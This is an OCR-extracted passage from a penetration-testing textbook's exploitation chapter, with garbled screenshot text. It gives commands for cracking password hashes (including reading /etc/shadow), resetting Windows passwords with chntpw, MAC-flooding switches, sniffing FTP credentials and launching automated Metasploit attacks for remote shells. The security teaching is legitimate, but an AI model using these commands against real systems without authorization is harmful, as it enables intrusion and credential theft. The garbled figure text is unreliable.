5945penetration tester you will still find systems which are utilizing and storing LM
5946hashes. Modern versions of Windows do not use or store LM hashes by default;
5947however, there are options to enable LM on these systems. This "feature" is
5948implemented to support backward compatibility with legacy systems. As a side
5949note, you should always upgrade, or discontinue the use of any legacy software
5950that requires you to use LM hashes. Old systems often put your entire network
5951at risk.
5952
5953John the Ripper is capable of cracking passwords by using a password dic-
5954tionary or by brute forcing letter combinations. As we discussed earlier, pass-
5955word dictionaries are lists of words and letter combinations. One advantage of
5956using a password dictionary is that it is very efficient. The main disadvantage
5957of this technique is that if the exact password is not in the dictionary, John
5958the Ripper will be unsuccessful. Another method for cracking passwords is to
5959brute force letter combinations. Brute forcing letter combinations means that
5960the password cracker will generate passwords in a sequential order until it has
5961exhausted every possible combination. For example, the password cracker will
5962begin by guessing the password as a single letter: "a." If that guess is unsuccess-
5963ful, it will try "aa." If that guess is unsuccessful, it will move to "aaa" and so on.
5964This process is typically much slower than a dictionary guessing attack, but the
5965advantage is that given enough time, the password will eventually be found. If
5966we try every letter in every possible combination, there is simply nowhere for a
5967password to hide. However, it is important to point out that brute forcing pass-
5968words of significant length and cipher would take many lifetimes to crack.
5969
5970John the Ripper is built into Backtrack. To run it, we can simply enter the fol-
5971lowing command into a terminal:
5972
5973John
5974
5975Invoking this command will actually run a script that will move us to the /pen-
5976test/passwords/jtr directory. Once inside the /pentest/passwords/jrt directory,
5977we can issue the following command:
5978
5979./John /tmp/hashes . txt
5980
5981
5982
5983The Basics of Hacking and Penetration Testing
5984
5985
5986
5987In the command above "./\ohn" is used to invoke the password cracking John
5988the Ripper program. Do not omit the "./" before the john command. This
5989forces Linux to run the program in the current directory. The next command "/
5990tmp/hashes.txt" is used to specify the location of the hashes that we extracted
5991using Samdump2. If you saved your hashes.txt file to a different location, you
5992will need to change this path.
5993
5994If your target machine is using NTLM hashes, you will need to add the "-f:NT"
5995switch. In this case, the command would look like the following:
5996
5997./john /tmp/hashes.txt -f:NT
5998
5999After issuing the appropriate command to instruct John the Ripper to run, the
6000program will attempt to crack the passwords contained in the hashes.txt file.
6001When John is successful in finding a password, it will display it to the screen.
6002Figure 4.10 shows the commands used to move into the John directory, running
6003John the Ripper, and the output of usernames and passwords that were cracked.
6004
6005Below you will find a brief recap of the steps used to crack Windows passwords.
6006It is important that you practice and fully understand how to complete each of
6007the steps below. If you are given physical access to a machine, you should be
6008able to complete steps 1-4 in less than five minutes. The time it takes to com-
6009plete step 5, the actual cracking of the passwords, will vary depending on your
6010resources and the quality or strength of the passwords you are cracking. You
6011should also become comfortable enough with each of the steps that you can
6012perform them without the aid of notes or a cheat sheet:
6013
60141. Shut down the target machine.
6015
60162. Boot the target to Backtack.
6017
60183. Mount the local hard drive.
6019
60204. Use Samdump2 to extract the hashes.
6021
60225. Use John the Ripper to crack the passwords.
6023
6024The process of cracking Linux and OSX passwords is much the same as the
6025method described above with a few slight modifications. Linux systems do not
6026
6027
6028
6029roouw, i :/i»nt/sdal/UIM00US/systcn3Z/conf igt
6030
6031rz-nnt/sdal/UINDOUS/systeiOZ/coiir icjtt john
6032[»] This script will take you to /pentest/passyards/jtr/
6033[»] From there, run .✓John <paraneters>
6034
6035rnoU'ht :/pentest/passwords/jtrS ./John /tap/hashes. txt
6036
6037Loaded 4 password hashes uith no different salts CLH DES 1128/126 BS SSE21)
6038QUERTV (Nolly)
6039(Guest )
6040
6041ABCDE (Administrator)
6042QAZSED (Haggle)
6043
6044guesses: 4 tine: 0:00:11:44 (3) c/s: 11298K trying: QAZSUD - QAZSOA
6045
6046rootUbt : /pcntcst/passuords/jtrt _
6047
6048
6049
6050FIGURE 4.10
6051
6052Cracked Passwords with John the Ripper.
6053
6054
6055
6056Exploitation CHAPTER 4
6057
6058
6059
6060use a SAM file to store the password hashes. Rather the encrypted Linux pass-
6061word hashes are contained in a file called the "shadow" file which is located at:
6062/etc/shadow.
6063
6064However, before you can use the /etc/shadow file with John the Ripper, it must be
6065joined with the /etc/passwd file. In many respects this is similar to how we had to
6066use the "system" file with the SAM file to extract Windows password hashes. John
6067the Ripper includes a function to combine the shadow and password files so you
6068can continue cracking the passwords. To accomplish this task, you need to use the
6069"unshadow" command, which is located in the /pentest/passwords/jtr directory.
6070To accomplish this, issue the following command in a terminal:
6071
6072./unshadow /etc/passwd /etc/shadow > /tmp/1 i nux_hashes . txt
6073
6074Here again, it is important not to forget the "./" m front of the "unshadow"
6075command. This command will join the /etc/passwd with the /etc/shadow file
6076and store the results in a file called "linux_hashes.txt" in the /tmp directory.
6077
6078Now that we have extracted the hashes, we are almost ready to begin cracking
6079the Linux passwords. However, before we can start, we need to use a version of
6080John the Ripper that supports cracking different types of password hashes. If
6081you use a wrong version or an unpatched version of John the Ripper, the pro-
6082gram will return a message saying, "No password hashes loaded." Most mod-
6083ern Linux systems store their passwords using the SHA hashing algorithm. With
6084this in mind, we have two choices: we can either patch the version of John the
6085Ripper or download a prepatched version. If you are unfamiliar with the patch-
6086ing process and manually compiling Linux source code, it may be easier to find
6087a prepatched version that supports SHA hashes. Once we have the correct ver-
6088sion of John the Ripper running, we can complete this task by issuing the fol-
6089lowing command from inside the /pentest/passwords/jtr directory:
6090
6091./John /tmp/1 i nux_hashes . txt
6092
6093John the Ripper contains many more options and switches that can be used to
6094greatly improve your cracking time and chances of success. You should spend
6095some time learning about each of these switches.
6096
6097PASSWORD RESETTING: KIND OF LIKE DRIVING A
6098BULLDOZER THROUGH THE SIDE OF A BUILDING
6099
6100There is another option for defeating passwords. This technique requires phys-
6101ical access to the target machine, and although it is very effective at gaining
6102you access to the target, it is also very noisy. In the previous section password
6103cracking was discussed. If a skilled penetration tester is able to access a target
6104machine alone for just a few minutes, he or she should be able to get a copy of
6105the password hashes. All things considered, this could be a very stealthy attack
6106and difficult to detect. In most cases, the penetration tester will leave few clues
6107that he or she were ever on the target machine. Remember the penetration tes-
6108ter can take the passwords off-site and crack them at his or her leisure.
6109
6110
6111
6112The Basics of Hacking and Penetration Testing
6113
6114
6115
6116Password resetting is another technique that can be used to gain access to a
6117system or to escalate privileges; however, this method is much less subtle than
6118password cracking. When first introducing this topic, it is common to compare
6119gaining access to a Windows machine by performing a password reset to a bur-
6120glar driving a bulldozer through the wall of a store in order to gain access to
6121the premises. It may be effective, but you can be sure that the storeowner and
6122employees will know that they were broken into.
6123
6124Password resetting is a technique that allows an attacker to literally overwrite
6125the SAM file and create a new password for any user on a modern Windows
6126system. This process can be performed without ever knowing the original pass-
6127word, although it does require you to have physical access to the machine.
6128
6129As with all other techniques discussed in this book, it is vital that you
6130have authorization before proceeding with this attack. It is also important
6131you understand the implications of this technique. Once you change the
6132password, there will be no way to restore it. As described in the beginning
6133of this section, it is very much like a burglar driving a bulldozer through the
6134side of a building. The next time a user attempts to log in and he or she finds
6135that the password has been changed, you can bet that someone is going to
6136notice.
6137
6138With that in mind, this is still an incredibly powerful technique and one that
6139can be very handy for gaining access to a system. To perform password reset-
6140ting, you will need to boot the target system to a Backtrack DVD. Once booted,
6141from the terminal you will need to mount the physical hard drive of the system
6142containing the SAM file. You can find the instructions for performing this task
6143in the previous section. After mounting the hard drive, you need to navigate to
6144the "/pentest/passwords/chntpw" directory. You can accomplish this by enter-
6145ing the following command:
6146
6147cd /pentest/passwords/chntpw
6148
6149From here you can run the "chntpw" command to reset the password. To
6150review the full options and available switches, you can issue the following
6151command:
6152
6153./chntpw -h
6154
6155Assume that you want to reset the administrator password on your target
6156machine. To accomplish this, you would issue the following command:
6157
6158./chntpw -i /mnt/sdal/WIND0WS/system32/config/SAM
6159
6160In the command above, the "./chntpw" is used to start the password resetting
6161program. The "-i" is used to run the program interactively and allow you to
6162choose the user you would like reset. The "/mnt/sdal/WINDOWS/system32/
6163config/SAM" is the mounted directory containing the SAM file of our target
6164machine. It is important to make sure you have access to the SAM file; remem-
6165ber not all drives are listed as sdal. As mentioned earlier, running the "fdisk
6166-1" command can be helpful in determining the appropriate drive.
6167
6168
6169
6170Exploitation CHAPTER 4
6171
6172
6173
6174After running the "./chntpw -i /mnt/sdal/WINDOWS/system32/conng/SAM"
6175command, you will be presented with a series of interactive menu-driven
6176options that will allow you to reset the password for the desired user. Each of
6177the steps is very clearly laid out and described; you simply need to take a few
6178moments to read what is being asked. The program is actually designed with a
6179series of "default" answers and in most cases you can simply hit the "enter" key
6180to accept the default choice.
6181
6182As shown in Figure 4.11, after loading, the first question you are asked is:
6183"What to do [1]?" Above the question you will see a series of five options to
6184choose from. Simply enter the number or letter that corresponds to the choice
6185you want to make and hit the "enter" key to continue. The "[1]" after the ques-
6186tion indicates that choice " 1 " is the default.
6187
6188In our example we are planning to reset the password for the administrator
6189account, so we can type " 1 " and hit enter or simply hit the enter key to accept
6190the default. Next we are presented with a list of users available on the local
6191Windows machine. You can select the desired user by typing in his or her user-
6192name as displayed. Once again, the default option is set to "Administrator."
6193Figure 4.12 shows a screenshot of the available users.
6194
6195Here again, we can simply hit the "enter" key to accept the default choice of
6196"Administrator. " Next we are presented with the various options for editing the
6197
6198
6199
6200<>========<> chntpw Wain Interactive Henu <>========<>
6201
6202Loaded hives: </mnts&Aa l/kl IND0US/systen32/conr ig/StVI>
6203
62041 - Edit user data and passwords
6205
62069 - Registry editor, now uith full write support*
6207
6208q - Quit (you uill be asked if there is sonetlting to sage)
6209
6210Uhat to do? 11] ->
6211
6212
6213
6214FIGURE 4.11
6215
6216Chntpw Interactive Menu.
6217
6218
6219
6220===== chntpu Edit User Info S Passwords
6221
6222
6223====
6224
6225
6226
6227
6228i FIB -
6229
6230
6231i Username
6232
6233
6234! Adnin?
6235
6236
6237i- Lock? — !
6238
6239
6240! 01M
6241
6242
6243t Administrator
6244
6245
6246; admin
6247
6248
62491 d is/ lock :
6250
6251
6252I 01f5
6253
6254
62551 Guest
6256
6257
6258i
6259
6260
6261! "BLANK" !
6262
6263
62641 03e8
6265
6266
6267! HelpAssistant
6268
6269
6270;
6271
6272
62731 1
6274
6275
62761 03eb
6277
6278
6279
6280
6281; fiBfiiH
6282
6283
6284t d is/ lock r
6285
6286
6287i 03ec
6288
6289
6290S Molly
6291
6292
6293; iiimiM
6294
6295
6296! d is/ lock 1
6297
6298
6299! 03ca
6300
6301
6302i SUPFOHT 338345*0
6303
6304
63051
6306
6307
6308! d is/ lock !
6309
6310
6311Select:
6312
6313
6314T - quit, . - list users, 0x<HID> - User
6315
6316
6317uith RID (hex)
6318
6319
6320or sinply enter the username to change:
6321
6322
6323ffldninistratorl _
6324
6325
6326
6327FIGURE 4.12
6328
6329List of Available Users to Reset Password.
6330
6331
6332
6333The Basics of Hacking and Penetration Testing
6334
6335
6336
6337- - - - User Edit Menu !
6338
63391 - Clear (blank} user passuord
6340
63412 - Edit (set new) user uassuord! (careful with this on XP or Uista)
6342
63433 - Promote user (Make user an administrator)
6344
63454 - Unlock and enable user account (probably Lucked ncrul
6346q - Quit editing user, back to user select
6347
6348Select: [q] >
6349
6350
6351
6352FIGURE 4.13
6353
6354Chntpw User Edit Menu.
6355
6356user on the target machine as shown in Figure 4.13. Please note that at this
6357step you do not want to accept the default option!
6358
6359As previously mentioned, at this point you want to be sure you select option
6360"1" to clear the password. After entering your selection to clear the user pass-
6361word, you will get a message stating: "Password cleared! " At this point you can
6362reset another user's password or enter "!" to quit the program. It is important
6363that you complete the remaining steps because at this point the new SAM file
6364has not been written to the hard drive. In the menu that follows enter "q" to
6365quit the chntpw program. At last you will be prompted with a message asking
6366if you would like to write your changes to the hard drive. Be sure to enter "y" at
6367this step as the default is set to "n."
6368
6369The password for the selected user has now been cleared and is blank. You can
6370shut down Backtrack by issuing the "reboot" command and ejecting the DVD.
6371When Windows restarts, you can log into the account by leaving the password
6372blank.
6373
6374With a little practice, this entire process, including booting Backtrack, clearing
6375the password, and booting into Windows, can be completed in less than five
6376minutes.
6377
6378SNIFFING NETWORK TRAFFIC
6379
6380Another popular technique that can be used to gain access to systems is net-
6381work sniffing. Sniffing is the process of capturing and viewing traffic as it is
6382passed along the network. Several popular protocols in use today still send
6383sensitive and important information over the network without encryption.
6384Network traffic sent without using encryption is often referred to as clear text
6385because it is human readable and requires no deciphering. Sniffing clear text
6386network traffic is a trivial but effective means of gaining access to systems.
6387
6388Before we begin sniffing traffic, it is important that you understand some basic
6389network information. The difference between promiscuous mode and nonpro-
6390miscuous network modes will be discussed first.
6391
6392By default most network cards operate in nonpromiscuous mode. Non-
6393promiscuous mode means that the network interface card (NIC) will only
6394pass on the specific traffic that is addressed to it. If the NIC receives traffic that
6395matches its address, the NIC will pass the traffic onto the CPU for processing.
6396
6397
6398
6399Exploitation CHAPTER 4
6400
6401
6402
6403If the NIC receives traffic that does not match its address, the NIC simply dis-
6404cards the packets. In many ways, a NIC in nonpromiscuous mode acts like a
6405ticket taker at a movie theater. The ticket taker stops people from entering the
6406theater unless they have a ticket for the specific show.
6407
6408Promiscuous mode on the other hand is used to force the NIC to accept all
6409packets that arrive. In promiscuous mode, all network traffic is passed onto the
6410CPU for processing regardless of whether it was destined for the system or not.
6411
6412In order to successfully sniff network traffic that is not normally destined for
6413your PC, you must make sure your network card is in promiscuous mode.
6414
6415You may be wondering how it is possible that network traffic would arrive at
6416a computer or device if the traffic was not addressed to the device. There are
6417several possible scenarios where this situation may arise. First any traffic that is
6418broadcast on the network will be sent to all connected devices. Another exam-
6419ple is networks that use hubs rather than switches to route traffic.
6420
6421A hub works by simply sending all the traffic it receives to all the devices con-
6422nected to its physical ports. In networks that use a hub, your NIC is constantly
6423disregarding packets that do not belong to it. For example, assume we have a
6424small 8-port hub with 8 computers plugged into the hub. In this environment
6425when the PC plugged into port number 1 wants to send a message to the PC
6426plugged into port number 7, the message (network traffic) is actually delivered
6427to all the computers plugged into the hub. However, assuming all the computers
6428are in nonpromiscuous mode, machines 2-6 and 8 simply disregard the traffic.
6429
6430Many people believe you can fix this situation by simply swapping your hubs
6431with switches. This is because unlike hubs that broadcast all traffic to all ports,
6432switches are much more discrete. When you first plug a computer into a switch,
6433the MAC address of the computer's NIC is registered with the switch. This
6434information (the computer's MAC address and switch's port number) is then
6435used by the switch to intelligently route traffic for a specific machine to the spe-
6436cific port. Going back to your previous example, if a switch is being used and
6437PC 1 sends a message to PC 7, the switch processes the network traffic and con-
6438sults the table containing the MAC address and port number. It then sends the
6439message to only the computer connected to port number 7. Devices 2-6 and 8
6440never receive the traffic.
6441
6442MACOF: MAKING CHICKEN SALAD OUT OF
6443CHICKEN SH*T
6444
6445It should be pointed out that the discrete routing property of a switch was orig-
6446inally designed to increase performance, not to increase security. As a result of
6447this, any increase in security should be viewed as a by-product of the design
6448rather than its original goal. Keeping this in mind, before you run out to
6449replace all your hubs with switches, you should be aware that there are tools
6450available that can be used against a switch to make it act like a hub. In other
6451
6452
6453
6454The Basics of Hacking and Penetration Testing
6455
6456
6457
6458words, in some instances, we can cause a switch to broadcast all traffic to all
6459ports making it behave exactly like a hub.
6460
6461Most switches have a limited amount of memory that can be used to remem-
6462ber the table containing MAC address and corresponding port numbers. By
6463exhausting this memory and flooding the table with bogus MAC addresses, a
6464switch will often become incapable of reading or accessing valid entries in the
6465MAC to port table. Because the switch cannot determine the correct port for
6466a given address, the switch will simply broadcast the traffic to all ports. This
6467model is known as "fail open." The concept of fail open simply means that
6468when the switch fails to properly and discretely route traffic, it falls back to a
6469hub-like state (open) that sends all traffic to all ports.
6470
6471You should be aware that some switches are configured to "fail closed."
6472Switches that fail closed operate in exactly the opposite manner of a fail open
6473switch. Rather than broadcasting all traffic to all ports, fail closed switches sim-
6474ply stop routing traffic altogether. However, as a penetration tester or hacker,
6475there is an upside to this configuration as well. If you are able to prevent the
6476switch from routing traffic, you have stopped all traffic on the network and
6477caused a Denial of Service.
6478
6479Dsniff is an excellent collection of tools that provide many useful functions
6480for sniffing network traffic. It is recommended that you take time and review
6481each of the tools and documentation included with dsniff. One of the dsniff
6482tools written by Dug Song, called macof, provides us with the ability to flood a
6483switch with thousands of random MAC addresses. If the switch is configured to
6484fail open, the switch will begin to act like a hub and broadcast all traffic to all
6485ports. This will allow you to overcome the selective routing of a switch and sniff
6486all network traffic passing through the device. Macof is built into Backtrack and
6487can be run by issuing the following command in a terminal window:
6488
6489macof -i ethO -s 172.16.45.123 -d 172.16.45.2
6490
6491In the preceding example, "macof" is used to invoke the program. The
6492macof program will generate and flood the network with thousands of MAC
6493addresses. The "-i" switch is used to specify your computer's network card.
6494This is where the MAC addresses will be sent from. The "-s" is used to specify
6495the source address. The "-d" is used to specify the destination or target of your
6496attack. Figure 4.14 shows an example of the command used to start macof, and
6497a selection of the generated output.
6498
6499As a final word of caution, using macof will generate tremendous amounts of
6500network traffic and is therefore easily detectable. You should use this technique
6501only when stealth is not a concern.
6502
6503With the concepts of promiscuous mode and the ability to sniff traffic on a
6504switch in mind, you can examine another popular tool that can be used to
6505view and capture network traffic. One of the simplest and most powerful tools
6506for sniffing network traffic is Wireshark. Wireshark was originally written by
6507
6508
6509
6510Exploitation CHAPTER 4
6511
6512
6513
6514rdotgvbt: - - 5hull - KOrtiale
6515
6516
6517
6518Session Edit View Bookmarks Settings Help
6519
6520
6521
6522rootgbt:-* ntacof -i ttM -s 172.11.4}. 123 -d 172. 16.45. .'|
6523
6524a8:(c:8e:13:l5:6b 5b:fd:d:2a:49:4<: 172.16.45.123.33053 > 172.16.45.2.41851: S 32
65252521146:3225211461!)) win 512
6526
6527d7:S6:73:5e:53:5a 77:7e:a:45:a4:9f 172. 16.45. 123. S1S7 > 172.16.45.2.28216: S 165
65280446273:1659446273(0) win 522
6529
653015:82: 43:59:91: SI bl : 5c :68; It :8c:db 172 . 16 .45. 123.24448 > 172.16.45.2.45912: S 2
6531883979392:2883979392(9) win 512
6532
653331:67:S8: le;9b:8t 10 :43:4L>: 36 :d2: ritj 172.16.45.123.25389 > 172.16.45.2.29557: 5 8
653425762369:825762368(8) win 512
6535
65368f :9b:d6:43:d9:7a a8; 26 : 5 ; 19 :B2 :e8 172,16.45,123,46532 J 172.16.45.2.39713: 5 13
653774791386:1374791385(91 win 512
6538
6539
6540
6541FIGURE 4.14
6542
6543Using Macof to Flood a Switch.
6544
6545
6546
6547
6548Gerald Combs in 1998. This popular tool is a free network protocol analyzer
6549that allows you to quickly and easily view and capture network traffic. You
6550can download Wireshark for free from http://www.wireshark.org. Wireshark is
6551an extremely flexible and mature tool. It should be noted that prior to 2006
6552Wireshark was known as Ethereal. Even though the program remained the
6553same, the name was changed due to some trademark issues.
6554
6555Wireshark is built into Backtrack and can be accessed through the K-Menu
6556dragon by selecting: K-Menu — » Backtrack — * Privilege Escalation — * Sniffers — »
6557Wireshark as shown in Figure 4.15.
6558
6559Remember that by default Backtrack does not turn enable or start any of your
6560network interfaces. Be sure that you have enabled and configured at least one
6561network interface in Backtrack before running Wireshark. The instructions for
6562doing this can be found in Chapter 1 .
6563
6564When you first start Wireshark inside of Backtrack, you will get a message tell-
6565ing you that "Running Wireshark as user 'root' can be dangerous." You can
6566
6567
6568
6569The Basics of Hacking and Penetration Testing
6570
6571
6572
6573::â– ]' yiev CapTurc Analyze Stat'**'" Telephony Jools fcfolp
6574
6575atitM \ o o f o o •
6576
65771- |lg*«Hon... |a«»l|Ap rtyi
6578
6579
6580
6581
6582"Click hereto list all of the available interfaces
6583
6584
6585
6586FIGURE 4.16
6587
6588Wireshark Button to Select the Capture Interface.
6589
6590
6591
6592Device Description
6593etho
6594
6595tflany Psaudo.dtviee that capture on i
6596'.* usbmonl USB bus number 1
6597tf usbmonZ U50 bus number 2
6598Bio
6599bnlp
6600
6601
6602
6603Packets Pactretsfs
6604
6605
6606
660717! 16.45435
6608
6609
6610
6611FIGURE 4.17
6612
6613Wireshark Capture Interfaces Window.
6614
6615
6616
6617Start
6618
6619
6620Options
6621
6622
6623
6624
6625
6626
6627
6628
6629Options
6630
6631
6632S «
6633
6634
6635Options
6636
6637
6638
6639
6640
6641
6642
6643click "OK" to acknowledge this warning. When you first start Wireshark you
6644will need to select your network card and ensure that it is properly set up to
6645capture all available traffic. You can do this by clicking on the icon showing
6646a network card and a menu list. The icon is located in the upper left corner of
6647the program. Figure 4.16 shows a screenshot of the button.
6648
6649Selecting the "List available capture interfaces..." button will bring up a new
6650window displaying all the available interfaces. From here you will be able to
6651view and select the appropriate interface. You can begin a simple capture by
6652accepting the defaults and clicking on the "Start" button associated with the
6653desired NIC or you can customize your capture options by clicking on the
6654"Options" button. Figure 4.17 shows an example of the Wireshark Capture
6655Interfaces window.
6656
6657Because we are focusing on the basics, we will leave the default options and
6658select the "Start" button. The Wireshark capture window should fill rapidly and
6659continue to stream packets as long as you let the capture run. Do not worry
6660about attempting to view this information on the fly. Wireshark allows us to
6661save the capture results and review them later.
6662
6663To facilitate this example, you should start an FTP server on one of the
6664machines attached to the network. Now that Wireshark is up and running, that
6665is, capturing network traffic in promiscuous mode, it is possible to log into
6666the FTP server as the user "ownedb." After letting the Wireshark capture run
6667for several minutes, stop the capture by clicking on the button with a Network
6668card; a red "x." This button is located in the menu at the top of the Wireshark
6669capture window as shown in Figure 4.18.
6670
6671
6672
6673Exploitation CHAPTER 4
6674
6675
6676
6677Capturing from olhO - Wirwsharfc
6678
6679
6680
6681£(1* £tt(t yi*w £o £»piuf« fin*ly» gtatifttCl T#Uphemy_ Jooll tJilp
6682
6683ttt WK®* ♦ s o o # a y
6684
6685F*»r: J 1-r.J EKprMBon.„ Ct»*r Apply
6686
6687
6688
6689FIGURE 4.18
6690
6691Stopping the Wireshark Capture.
6692
6693
6694
6695DthO: C J plait â– tig - Wirc^Kdik
6696
6697
6698
6699i '.■L-i'. , £o £opttiro ^rulyio Simmies Telephony Jock td«lp
6700
6701
6702
6703Bt M 31 ft * « U x w =
6704
6705
6706
6707n.i »
6708
6709175. 1G.4S. 12&
6710172. 16, 45. 1»
6711
6712
6713
6714.15,45.131
6715
6716
6717
6718172. 16. 45.129
6719
6720its. m
6721
6722
6723
6724| • [ E S pt« W n.., | cbnf|Apptr |
6725
6726
6727
6728TCP
6729FTP
6730
6731
6732
6733"â„¢ftp^
6734
6735FTP
6736
6737tcp
6738
6739
6740
6741P*3Pffnj»; 220 UsfTPd 2,0,71
6742
674349804 > >tr^ r.MN l 1 A£k>21 Win=SSSS Lon^D TSYiilG772140 TSB*
6744
6745Hcquti-at QjjfeH uwnpd^
6746
6747ftp > A8^S*fnTf*?*q"21 *ck«14 wifr*582* Len-O T£Vn22778880 TEE
6748Response: 331 Pleas* specify th * password.
6749
67504BS04 > 'MjT f*^' 1 ! j^f- 1 " Aek=55 Win =5856 L*n=0 T £V-= 1 67731 Q) T£
6751ftp > 4^BJ"TWTT^*Q"» *ck*2^' Win "5834 Len«Q TSV-33779791 TSE
6752
6753
6754
6755FIGURE 4.19
6756
6757Using Wireshark to Sniff FTP Credentials.
6758
6759
6760
6761Once the network capture has been stopped, you are free to review the pack-
6762ets captured by Wireshark. You should take some time to review your capture
6763and attempt to identify any relevant information. As shown in Figure 4.19, our
6764packet dump was able to successfully capture the username, password, and IP
6765address of the FTP server! We could now use this information to log into the
6766FTP server.
6767
6768If you performed a capture on a particularly busy network, you may find the
6769volume and sheer number of captured packets overwhelming. Manually
6770reviewing a large packet capture may not be feasible. Luckily Wireshark
6771includes a filter that can be used to drill down and refine the displayed output.
6772Revisiting our previous example, we could enter the keyword "ftp" in the Filter
6773box and click the "Apply" button. This will cause Wireshark to remove all pack-
6774ets that do not belong to the FTP protocol from our current view. Obviously,
6775this will significantly reduce the number of packets we need to review.
6776Wireshark includes some incredibly powerful filters. It is well worth the effort
6777to take the time to review and master Wireshark filters. It should be pointed
6778out that you can always remove your current filtered view and go back to the
6779original packet capture by clicking the "Clear" button.
6780
6781FAST-TRACK AUTOPWN: BREAKING OUT THE M-60
6782
6783An earlier section described the use of Metasploit as a sniper rifle for taking
6784down vulnerable and unpatched systems. Another tool called Fast-Track is
6785built on Metasploit; but rather than requiring the penetration tester to dig for
6786vulnerabilities and match exploits, Fast-Track simply automates the entire pro-
6787cess. When using Fast-Track, the only thing a penetration tester needs to do is
6788to enter the target's IP address.
6789
6790
6791
6792The Basics of Hacking and Penetration Testing
6793
6794
6795
6796There is nothing subtle or stealthy about Fast-Track. The tool works by con-
6797ducting a port scan of the target; based on the information returned from the
6798port scan, Fast-Track sprays every known or possible matching exploit against
6799the target. Fast-Track takes the "let's throw everything at the wall and see what
6800sticks" approach to exploitation. Even if Fast-Track is successful in getting a
6801shell, the tool continues spraying attacks against the target until all the possible
6802exploits have been attempted. When used against weak targets, this will often
6803lead to multiple shells.
6804
6805The easiest way to start Fast-Track is to click on the K-Start dragon — > Backtrack
6806— > Penetration — > Fast Track — > Fast-Track WebGUI as shown in Figure 4.20.
6807
6808Once started, Fast-Track will open a terminal window and run a series of com-
6809mands. After a brief pause, Firefox will automatically open to the Fast-Track
6810web page. From the main Fast-Track page, you can click on the Autopwn
6811Automation link as shown in Figure 4.21.
6812
6813After selecting the Autopwn Automation link, you can scroll the web page
6814down and find the "Enter IP Address or Range:" textbox. Enter your target
6815IP into the text box provided and choose if you want a bind or reverse shell
6816on the target. Once you have set these options, you can click the "Metasploit
6817Autopwn" link at the bottom of the page as shown in Figure 4.22.
6818
6819Clicking the Metasploit Autopwn link will cause Fast-Track to unleash a flood
6820of exploits against your target. The system will open a terminal window and
6821begin issuing commands automatically. This process may take several min-
6822utes to complete. You can watch the progress of the program as it scrolls by
6823in the terminal window. You will also be able to see an accurate count of the
6824number of remote shells that were automatically established. When Fast-Track
6825has exhausted its supply of potential exploits, you can view any and all of the
6826
6827
6828
6829All Applications
6830
6831
6832
6833M internet
6834
6835
6836
6837_
6838*
6839
6840
6841
6842services
6843
6844Graphics
6845
6846Multimedia
6847
6848System
6849
6850Utilities
6851
6852KSnapshot
6853
6854Actions
6855Settings
6856System Menu
6857Run Command..
6858Lock Sesston
6859Log Out...
6860
6861
6862
6863
6864information Gathering
6865
6866* * Network Mapping
6867
6868* < Vulnerability Identification
6869
6870* « Web Application Analysis
6871f * Radio Network Analysis
6872
6873iEESSS
6874
6875
6876
6877
6878BtplOitDB
6879
6880
6881
6882, Fast Track WebGUI
6883
6884mnanct Lino
6885*j ^"Reverse fcngmeenng
6886*j * Voice Over IP
6887* Miscellaneous
6888
6889
6890
6891< Inguma
6892
6893« Metasploit Exploitation Framework
68944 Social Engineering Toolkit
6895' I Sapyto
6896
6897
6898
689911:51
6900
6901
6902
6903FIGURE 4.20
6904
6905Starting the Fast-Track WebGUI.
6906
6907
6908
6909Exploitation CHAPTER 4
6910
6911
6912
6913Fast-Track Web Interface - MoziNa Firefox
6914
6915
6916
6917File Edit ¥iew History Bookmarks Tools Help
6918#* ^ - ie) & | http^ocalho?tua44a/
6919HBackTTsck Linux Offensive -Security a Tiger Security JjExploit Database )^Aircrack-ng
6920
6921
6922
6923I' P '
6924
6925
6926
6927Fast-Track
6928
6929
6930
6931WHERE ITS Off TO FINISH IN UNDER 3 MINUTES.
6932
6933
6934
6935i
6936
6937
6938
6939
6940Fast-Track Main Page
6941
6942Welcome lo Fast-Track version 4. this version Is primarily Tocus
6943documentation, exploit fl Wltt B l into Fast-Track A lot has chang
6944fot in- latest information and updates Additionally below will be
6945nexl r*teas* or milestones for new versions
6946
6947
6948
6949FIGURE 4.21
6950
6951Selecting Autopwn Automation from the Fast-Track WebGUI.
6952
6953
6954
6955Fast-Track Web interface - Mozilla Firefox
6956
6957
6958
6959file £dtt ^Jew History Bookmarks ]£ols Help
6960^ HP* v X e ktp://localhost;4^4/autopwn
6961
6962H Backpack Linux M Offensive-Sec urit y a Tiger Security 0Exp1cit Database ItAlrcrack-ng
6963
6964
6965
6966HE
6967
6968
6969
6970Metasploit Autopwn Options
6971
6972
6973
6974
6975
6976Enter the IP address or range of IP addresses to attack, its generally recommended to ofirjf
6977target specific ports, when running buffer overflows on remote systems. II generaltytenrJsto
6978send off massive alarms and down various systems To tweak this, lets say we only warn to
6979ttrget MS SQL and Veritas NetBackup. we would place*p1 433.10000 10 21 1 55 6-254, the -p
6980specifies pals. 1433 and 1QD00 is USSQL server default ports andverrtas neltaackup perls
6981
6982
6983
6984
6985^Enter the IP Address or Range: BmBWv
6986
6987
6988
6989
6990Select If you wanl a reverse payfoad or bind payload Bind s Conned lo victim. Reverse 5
6991td n tonnecti id^ui^^
6992
6993
6994
6995
6996^jytold Options: JQ^QJ^J^^^^J^
6997
6998
6999
7000
7001
7002
7003
7004
7005Below you can simply click the "Update Ueiaspioir butlon in cider to ensure your running the
7006latest version ofMstasploil
7007
7008
7009
7010FIGURE 4.22
7011
7012Fast-Track Autopwn Options.
7013
7014
7015
7016The Basics of Hacking and Penetration Testing
7017
7018
7019
7020aiaf ^ sessions -J^
7021Active sessions
7022
7023
7024
7025
7026Inf ornation
7027
7028
7029
7030Connection
7031
7032
7033
70341 / interpreter x86/uin32 NT ftl)THORITY\SYSTEM @ JI.THNQ7CBGM 172.16.45.135
7035:17887 -> 172.16.15.130:1033
7036
7037
7038
7039asf ^Oesslons -
7040â– atarp r.ili;. > |
7041
7042
7043
7044action with 1.
7045
7046
7047
7048FIGURE 4.23
7049
7050Listing and Using Shells Generated from Fast-Track.
7051
7052
7053
7054shells that were obtained by issuing the following command within the Fast-
7055Track terminal window:
7056
7057sessions -1
7058
7059If Fast-Track was successful in creating remote access to the target machine, this
7060command (please note that is a dash lower case "L") will list each shell that
7061was opened. To use a shell, you can issue the following in the Fast-Track termi-
7062nal window:
7063
7064sessions -i shell_id
7065
7066In this command the shelljd is replaced with the session number as listed
7067from the "sessions -1" command. Running this command will drop you into
7068a shell on the remote machine. Figure 4.23 shows an example of both of these
7069commands.
7070
7071At this point you have a fvleterpreter shell on the target machine. Figure 4.24
